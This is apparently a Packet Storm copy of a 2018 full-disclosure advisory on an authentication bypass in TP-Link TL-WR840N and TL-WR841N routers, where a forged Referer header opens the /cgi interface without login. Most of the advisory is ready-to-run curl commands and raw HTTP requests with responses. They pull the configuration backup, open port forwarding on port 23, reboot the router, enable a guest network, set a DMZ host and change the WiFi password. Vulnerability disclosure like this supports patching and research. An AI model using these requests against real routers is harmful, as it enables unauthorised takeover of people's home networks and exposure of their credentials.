exploit the possibilities

TP-Link TL-WR840N / TL-WR841N Authentication Bypass

TP-Link TL-WR840N / TL-WR841N Authentication Bypass
Posted May 28, 2018
Authored by BlackFog Team

TP-Link TL-WR840N and TL-WR841N suffer from an authentication bypass vulnerability.

tags | exploit, bypass
MD5 | 4e4752746e00d86550836eadca25362e

TP-Link TL-WR840N / TL-WR841N Authentication Bypass

Change Mirror Download
Title: TP-Link Multiple Router(TL-WR840N and TL-WR841N) Unauthenticated
Router Access Vulnerability
Author: BlackFog Team
Date: 27 May 2018
Website: SecureLayer7.net
Contact: info@securelayer7.net

Version: 0.9.1 4.16 v0001.0 Build 170622 Rel.64334n
Hardware: TL-WR841N v13 00000013

Version : Firmware Version: 0.9.1 3.16 v0001.0 Build 170608 Rel.58696n
Hardware Version: TL-WR840N v5 00000005

Vendor Description: TP-Link is the world's #1 provider of consumer WiFi
networking devices, shipping products to over 120 countries and hundreds of
millions of customers. (source https://www.tp-link.com/)


Attack Description :
This issue is caused by improper session handling on /cgi/ Folder or /cgi
file found by Touhid Shaikh(BlackFog Team Member).

if any attacker sends Referer Header with its request and sets Referer:
http://192.168.0.1/mainFrame.htm dan its no authentication required and an
attacker can do router's action without authentication.
below are some of few examples you can see. But the attacker can do mostly
all of the action on a router without Authentication.

NOTE: Except admin's password change bcz its required current password for
changing

##### POC ######
----------------------- Fail attempt -------------------------
root@linux:/workspace# curl -i -s -k -X GET http://192.168.0.1/cgi/conf.bin
HTTP/1.1 403 Forbidden
Content-Type: text/html; charset=utf-8
Content-Length: 106
Connection: close

<html><head><title>403 Forbidden</title></head><body><center><h1>403
Forbidden</h1></center></body></html>

-----------------------------------------------------

--------------- Seccessfull attempt --------------------------------
root@linux:/workspace# curl -i -s -k -X GET -H "Referer:
http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin
HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5984
Connection: keep-alive

root@linux:/workspace# curl -s -k -X GET -H "Referer:
http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin >
backup.bin
root@linux:/workspace# file backup.bin
backup.bin: data
root@linux:/workspace# ls -la backup.bin
-rw-r--r-- 1 root root 5720 Mar 30 17:17 backup.bin

----------------------------------------------------
##### POC END ######


Evil Actions Without Authentication example.
============== Burp Request and curl command for conf.bin or backup file
=================


####### Burp ########
GET /cgi/conf.bin HTTP/1.1
Host: 192.168.0.1
User-Agent: Agent22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/mainFrame.htm
Connection: close
Upgrade-Insecure-Requests: 1

-------Response--------
HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5720
Connection: close

w@\AAb AaLA1/2AaA-Aa!AEa1A>>aAA!,*-A h[Aa1A3lAa!AA.A(c)-
.....SKIP.......
8/i?1/2i?1/2i?1/2i?1/2W


######## Curl ##########
curl -i -s -k -X $'GET' -H $'Host: 192.168.0.1' -H $'User-Agent:
Agent22' -H $'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H
$'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H
$'Referer: http://192.168.0.1/mainFrame.htm' -H $'Connection: close' $'
http://192.168.0.1/cgi/conf.bin' > backup.bin

------ take a look in backup.bin file --------

===========================================



=========== Add Port Forwarding ============
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP
or UDP\x0d\x0aopenProtocol=TCP or
UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' http://192.168.0.1/cgi?3

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive

[1,1,2,7,0,0]0
triggerPort=23
triggerProtocol=TCP or UDP
openProtocol=TCP or UDP
enable=1
openPort=23
[error]0

----- Decription -----
enable=0 is for disable
enable=1 is for enable
u can change port also.
====================================



=========== Reboot Router =========================
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' http://192.168.0.1/cgi?7

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive

[error]0

----Description -----
error = 0 means reboot seccessully
======================================



============= Enable Guest Network ==========================
curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Aent22'
-H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H
$'Accept-Encoding: gzip, deflate' -H $'Content-Type: text/plain' -H
$'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 844' -H
$'Connection: close' --data-binary
$'[LAN_WLAN_MULTISSID#1,1,0,0,0,0#0,0,0,0,0,0]0,1\x0d\x0amultiSSIDEnable=1\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,1,1,0,0,0#0,0,0,0,0,0]1,11\x0d\x0aIsolateClients=0\x0d\x0aEnable=1\x0d\x0aSSID=Agent22\x0d\x0aBeaconType=WPAand11i\x0d\x0aWPAAuthenticationMode=PSKAuthentication\x0d\x0aWPAEncryptionModes=TKIPandAESEncryption\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=TKIPandAESEncryption\x0d\x0aPreSharedKey=9876543210\x0d\x0aGroupKeyUpdateInterval=0\x0d\x0aMaxStaNum=32\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,2,1,0,0,0#0,0,0,0,0,0]2,1\x0d\x0aIsolateClients=0\x0d\x0a[LAN_WLAN_GUESTNET#1,1,0,0,0,0#0,0,0,0,0,0]3,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=1\x0d\x0a[LAN_WLAN_GUESTNET#1,2,0,0,0,0#0,0,0,0,0,0]4,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=0\x0d\x0a'
$'http://192.168.0.1/cgi?2&2&2&2&2'

------- Description ----------
SSID=Agent22
PreSharedKey=9876543210
=============================================



======= DMZ enable and Disable on 192.168.0.112 ===========
curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent:
Agent22' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H
$'Content-Length: 78' -H $'Connection: close' --data-binary
$'[DMZ_HOST_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,2\x0d\x0aenable=1\x0d\x0aIPAddress=192.168.0.112\x0d\x0a'
$'http://192.168.0.1/cgi?2'

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close

[error]0

-------Description -----------
IPAddress=192.168.0.112
enable=1 or 0 (enable or disable)
=================================================

=============== WiFi Password Change =============
curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent:
Agent22' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type:
text/plain' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H
$'Content-Length: 199' -H $'Connection: close' --data-binary
$'[LAN_WLAN#1,1,0,0,0,0#0,0,0,0,0,0]0,5\x0d\x0aBeaconType=11i\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=AESEncryption\x0d\x0aX_TP_PreSharedKey=9876543210\x0d\x0aX_TP_GroupKeyUpdateInterval=0\x0d\x0a'
$'http://192.168.0.1/cgi?2'

-------Description -----------
IEEE11iAuthenticationMode=PSKAuthentication
IEEE11iEncryptionModes=AESEncryption
X_TP_PreSharedKey=9876543210
===============================



======= Report Timeline =============
30 Mar, 2018 ----- Initial Report (support.in@tp-link.com) (No Response)
27 May, 2018 ----- Full Disclosure

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    1 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    12 Files
  • 13
    Feb 13th
    18 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    19 Files
  • 20
    Feb 20th
    20 Files
  • 21
    Feb 21st
    15 Files
  • 22
    Feb 22nd
    2 Files
  • 23
    Feb 23rd
    2 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close